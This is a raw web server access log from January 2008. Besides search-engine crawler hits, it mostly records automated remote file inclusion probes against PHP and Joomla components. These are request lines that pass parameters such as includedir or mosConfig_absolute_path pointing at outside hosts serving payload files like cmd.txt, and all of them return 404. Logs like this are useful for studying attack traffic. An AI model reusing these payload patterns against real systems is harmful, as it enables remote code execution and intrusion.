216.175.17.27 - - [03/Jan/2008:07:37:46 -0800] "GET /logs//////////////ws/get_reminders.php?includedir=http://jorgevolio.com/.cookies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.72 - - [03/Jan/2008:07:40:36 -0800] "GET /minamijewelry/?M=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.109.149.250 - - [03/Jan/2008:07:41:40 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ultrasofts.com/asdf.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
212.109.149.250 - - [03/Jan/2008:07:41:40 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ultrasofts.com/asdf.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
58.74.175.5 - - [03/Jan/2008:07:42:36 -0800] "GET /logs/access_071214.log/tools/send_reminders.php?noSet=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [03/Jan/2008:07:42:36 -0800] "GET /tools/send_reminders.php?noSet=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [03/Jan/2008:07:42:37 -0800] "GET /logs/tools/send_reminders.php?noSet=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [03/Jan/2008:07:42:42 -0800] "GET /logs/access_071220.log/tools/send_reminders.php?noSet=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.203.201 - - [03/Jan/2008:07:43:15 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.141.206 - - [03/Jan/2008:07:45:49 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:07:50:23 -0800] "GET /logs/access_071214.log/tools/send_reminders.php?noSet=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:07:50:24 -0800] "GET /tools/send_reminders.php?noSet=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:07:50:24 -0800] "GET /logs/tools/send_reminders.php?noSet=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:07:50:31 -0800] "GET /logs/access_071220.log/tools/send_reminders.php?noSet=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:07:51:30 -0800] "GET /logs/access_071119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:07:51:30 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:07:51:30 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:07:51:35 -0800] "GET /logs/access_071214.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:07:51:49 -0800] "GET /logs/access_071119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:07:51:49 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:07:51:49 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:07:51:53 -0800] "GET /logs/access_071214.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.203.201 - - [03/Jan/2008:07:52:35 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.203.201 - - [03/Jan/2008:07:52:35 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.141.206 - - [03/Jan/2008:07:52:57 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.206 - - [03/Jan/2008:07:52:58 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.206 - - [03/Jan/2008:07:52:58 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [03/Jan/2008:07:53:10 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [03/Jan/2008:07:53:11 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:07:53:19 -0800] "GET /logs/access_071224.log/ws/get_reminders.php?includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:07:53:19 -0800] "GET /ws/get_reminders.php?includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:07:53:20 -0800] "GET /logs/ws/get_reminders.php?includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.71 - - [03/Jan/2008:07:55:05 -0800] "GET /bikes/?S=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.76 - - [03/Jan/2008:07:57:38 -0800] "GET /logs/access_071126.log HTTP/1.0" 200 40511 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:07:58:06 -0800] "GET /logs/access_071224.log/ws/get_reminders.php?includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:07:58:06 -0800] "GET /ws/get_reminders.php?includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:07:58:07 -0800] "GET /logs/ws/get_reminders.php?includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.79.192.120 - - [03/Jan/2008:07:58:45 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.brockwhite.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
68.8.232.250 - warboard [03/Jan/2008:08:00:41 -0800] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33008 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=2&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:08:01:56 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:08:01:56 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [03/Jan/2008:08:01:56 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:08:04:43 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:08:04:43 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [03/Jan/2008:08:04:43 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.50.211.121 - - [03/Jan/2008:08:06:02 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.eyeconect.com/counter/database/includes/klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.20.52 - - [03/Jan/2008:08:06:57 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
88.191.20.52 - - [03/Jan/2008:08:06:58 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
62.193.248.204 - - [03/Jan/2008:08:08:15 -0800] "GET /logs/access_071220.log//modules/xfsection/modify.php?dir_module=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.248.204 - - [03/Jan/2008:08:08:15 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.248.204 - - [03/Jan/2008:08:08:15 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:08:08:58 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:08:08:58 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [03/Jan/2008:08:08:58 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.74.175.5 - - [03/Jan/2008:08:09:14 -0800] "GET /logs/access_071214.log/tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [03/Jan/2008:08:09:14 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [03/Jan/2008:08:09:15 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [03/Jan/2008:08:09:20 -0800] "GET /logs/access_071220.log/tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
130.94.69.17 - - [03/Jan/2008:08:09:38 -0800] "GET /logs/access_071119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
130.94.69.17 - - [03/Jan/2008:08:09:39 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
130.94.69.17 - - [03/Jan/2008:08:09:39 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
130.94.69.17 - - [03/Jan/2008:08:09:47 -0800] "GET /logs/access_071214.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:08:09:58 -0800] "GET /logs/access_071224.log/ws/get_reminders.php?includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:08:09:58 -0800] "GET /ws/get_reminders.php?includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:08:09:59 -0800] "GET /logs/ws/get_reminders.php?includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.206 - - [03/Jan/2008:08:10:53 -0800] "GET /bikes/?M=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.52.216.28 - - [03/Jan/2008:08:12:08 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.baptistwebdesign.com/mambots/content/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
64.13.248.15 - - [03/Jan/2008:08:12:49 -0800] "GET /logs/access_071119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.248.15 - - [03/Jan/2008:08:12:49 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.248.15 - - [03/Jan/2008:08:12:49 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.248.15 - - [03/Jan/2008:08:12:52 -0800] "GET /logs/access_071214.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.198.19 - - [03/Jan/2008:08:17:33 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
67.15.198.19 - - [03/Jan/2008:08:17:34 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
74.6.24.106 - - [03/Jan/2008:08:18:17 -0800] "GET /bikes/CreSTOC07/ HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.50.211.121 - - [03/Jan/2008:08:22:58 -0800] "GET /logs/access_071214.log/tools/send_reminders.php?noSet=0&includedir=http://www.eyeconect.com/counter/database/includes/klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.211.121 - - [03/Jan/2008:08:22:58 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.eyeconect.com/counter/database/includes/klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.211.121 - - [03/Jan/2008:08:22:58 -0800] "GET /logs/access_071220.log/tools/send_reminders.php?noSet=0&includedir=http://www.eyeconect.com/counter/database/includes/klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.142.186 - - [03/Jan/2008:08:26:44 -0800] "GET /logs/access_071119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.142.186 - - [03/Jan/2008:08:26:45 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.142.186 - - [03/Jan/2008:08:26:45 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.142.186 - - [03/Jan/2008:08:27:07 -0800] "GET /logs/access_071214.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.29.37 - - [03/Jan/2008:08:28:28 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.107 - - [03/Jan/2008:08:33:01 -0800] "GET /funny/?N=D HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:08:35:35 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:08:35:35 -0800] "GET /modifyform.html?code=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:08:35:36 -0800] "GET /logs/modifyform.html?code=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:08:36:31 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:08:36:32 -0800] "GET /modifyform.html?code=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:08:36:32 -0800] "GET /logs/modifyform.html?code=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:08:36:55 -0800] "GET /logs/access_071214.log/modifyform.html?code=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [03/Jan/2008:08:37:52 -0800] "GET /logs/access_071214.log/modifyform.html?code=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.116.91.12 - - [03/Jan/2008:08:39:02 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.116.91.12 - - [03/Jan/2008:08:39:02 -0800] "GET //skin/zero_vote/error.php?dir=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.116.91.12 - - [03/Jan/2008:08:39:02 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:08:39:52 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.116.91.12 - - [03/Jan/2008:08:40:52 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.17.101.126 - - [03/Jan/2008:08:43:50 -0800] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://hate.helloweb.eu/new.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
216.17.101.126 - - [03/Jan/2008:08:43:50 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://hate.helloweb.eu/new.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
204.110.231.76 - - [03/Jan/2008:08:45:11 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.110.231.76 - - [03/Jan/2008:08:45:11 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.110.231.76 - - [03/Jan/2008:08:45:11 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.164 - - [03/Jan/2008:08:46:25 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.164 - - [03/Jan/2008:08:46:26 -0800] "GET /?S=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.114.141.206 - - [03/Jan/2008:08:48:44 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.206 - - [03/Jan/2008:08:48:44 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.88.38 - - [03/Jan/2008:08:51:35 -0800] "GET /logs/access_071219.log/index.php?support=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.88.38 - - [03/Jan/2008:08:51:35 -0800] "GET /index.php?support=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.88.38 - - [03/Jan/2008:08:51:35 -0800] "GET /logs/index.php?support=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.79.192.120 - - [03/Jan/2008:08:53:29 -0800] "GET /index.php?themesdir=http://www.brockwhite.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.79.192.120 - - [03/Jan/2008:08:53:29 -0800] "GET /logs/index.php?themesdir=http://www.brockwhite.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
89.255.3.70 - - [03/Jan/2008:08:56:48 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:08:57:39 -0800] "GET /logs/access_071220.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:08:57:41 -0800] "GET //calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
